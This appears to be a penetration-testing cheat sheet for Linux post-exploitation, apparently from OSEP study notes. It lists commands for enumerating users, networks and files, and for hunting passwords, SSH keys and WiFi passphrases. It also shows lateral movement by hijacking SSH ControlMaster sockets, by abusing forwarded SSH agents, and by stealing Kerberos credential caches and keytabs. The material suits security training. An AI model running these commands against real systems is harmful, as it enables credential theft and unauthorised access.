Introduction

This section contains some useful commands that will help you enumerate the Linux system, obtaining helpful information for a later Privilege Escalation or Lateral movements.

User and group enumeration

• Print real and effective user and group IDs from the current user: id

• List all users, groups and shells for each user: cat /etc/passwd

• List user accounts who does not require password:

sudo awk -F: '($2==""){print}' /etc/shadow

• List the allowed (and forbidden) commands for the invoking or specified (-u) user: sudo -l

• List all existing groups: cat /etc/group | sort

• Print executed commands (Looking for credentials): {cat ~/.bash_history} | {history}

Operative System

• Architecture:

uname -a

• Environment variables:

env

Network Enumeration

• List network interfaces: ip -br a

• List all connections: netstat -putona

• List only listening ports: netstat pluton | ss -pltn

• List hardcoded domains: cat /etc/hosts

• List iptables: iptables -L

• Outgoing connections to a specific IP: ss -anpt | grep <NETWORK> | grep ESTAB

• Real-time traffic monitoring: tcpdump -i <if> -s0 -n -vv

• Obtian WiFi passwords: sudo grep psk= /etc/NetworkManager/system-connections/*

Files enumeration

Files owned by a user

There might be files owned by a specific user stored in hidden folders.

find / -type f -user <user> -or -group <group> 2>/dev/null | grep -v ^/proc

Modified files

There might be files being modified with a cronjob or during a workday.

find / -type f -newermt <start date range> ! -newermt <end date range>

Accessed files

There might be files being accessed with a cronjob or during a workday.

find / -type f -newerat <start date range> ! -newerat <end date range>

Disks

List mounted disks at Linux startup.

cat /etc/fstab

Password Enumeration

Look for files that contain passwords or keys.

# Passwords
grep  -rnw '/' -ie "passw" --color=always 2>/dev/null
cat ~/.bash_history | grep -i passw 
# Find SSH keys 
find / -type f -name id_rsa 2>/dev/null 
grep  -rnw '/' -ie "private key" --color=always 2>/dev/null

Cronjobs

List scheduled jobs.

cat /etc/crontab
crontabe -e

SSH

• Find SSH keys:

find /home/ -iname "id_rsa"
find /home/ -iname "*.key"

Control Master

When ControlMaster is enabled, the initial SSH connection (the master connection) is established, and subsequent connections (slave connections) can reuse the existing master connection. This can lead to faster connection times and reduced resource usage, especially when connecting to the same remote server multiple times.

If an attacker gains access to a system where SSH ControlMaster is in use, they might exploit the existing master connection to execute commands or perform other malicious activities without the need to authenticate repeatedly.

1. Check if the file ~/.ssh/config exists with the following configuration. Meaning, that ControlMaster is enabled.

Host *
        ControlPath ~/.ssh/controlmaster/%r@%h:%p
        ControlMaster auto
        ControlPersist 10m

2. Look for any active connection under ~/.ssh/controlmaster/.

offsec@controller:~$ ls -al ~/.ssh/controlmaster/
total 8
drwxrwxr-x 2 offsec offsec 4096 May 13 13:55 .
drwx------ 3 offsec offsec 4096 May 13 13:55 ..
srw------- 1 offsec offsec    0 May 13 13:55 offsec@linuxvictim:22

3. Use the existing connection to perform lateral movement.

• User: If you are the user to whom the connection file belongs, simply SSH to the session.

offsec@linuxvictim:22

• Root:

ssh -S /home/offsec/.ssh/controlmaster/offsec\@linuxvictim\:22 offsec@linuxvictim

SSH Agent Forwarding

SSH Agent Forwarding allows the SSH-Agent on a local machine to be used for authentication when connecting to remote servers.

If an attacker gains access to a machine where Agent Forwarding is active, they might abuse the forwarded agent connection to authenticate to other machines.

Check if ~/.ssh/config contains ForwardAgent yes or the SSH configuration /etc/ssh/sshd_config on the server must have AllowAgentForwarding yes. Then, check if there is any active connection.

ps aux | grep ssh

• User: If you are the user to whom the connection belongs, simply SSH to the session. Then, simply execute the SSH command to automatically access the other computer.

• Root: Inspect processes with "ssh" in the name, we will find any open connections from the host. We can use the usernames listed in these connections with the pstree command to get the process ID (PID) values for the SSH processes.

pstree -p <USER> | grep ssh
sshd(15228)---bash(15229)---su(15241)---bash(15242)
sshd(16380)---bash(16381)

Then, we extract the SSH_AUTH_SOCK environment variable from their connection to obtain the stored SSH socket.

cat /proc/16381/environ

After that, we need to add it:

root@controller:~# SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh-add -l

Finally, we can try to access the target we might have in mind that the victim is connecting to or look for clues in order to see where our victim is connecting to.

ss -ntp  | grep 22 | grep -i ssh

Kerberos

Kerberos tickets can also be found on Linux machines that belong to Active Directory domains. Enumerating the machine looking for Kerberos information can be crucial to perform lateral movement to other machines on the domain.

• Obtain domain information from the kerberos configuration file.

cat /etc/krb5.conf

• Find KRB user cache credentials.

find /tmp/ -type f -iname "*krb5cc_*" 2>/dev/null

• Impersonate user using krb5cc_ files.

sudo cp /tmp/krb5cc_* /tmp/krb5cc_minenow
sudo chown <ATTACKER_USER>:<ATTACKER_USER> /tmp/krb5cc_minenow
kdestroy
export KRB5CCNAME=/tmp/krb5cc_minenow
klist

• Find keytab files.

find / -type f -iname "*.keytab" 2>/dev/null
ls /etc/krb5.*

• Extract keytab information like domain, service principal and NTLM hash.

python3 KeyTabExtract/keytabextract.py krb5.keytab 

• List tickets currently stored in the user’s credential cache file.

klist

• Convert a Mimikatz ticket to ccache.

ticketConverter.py adminWebSvc.kirbi adminWebSvc.ccache
export KRB5CCNAME=/var/www/html/OSEP/Challenge6/adminWebSvc.ccache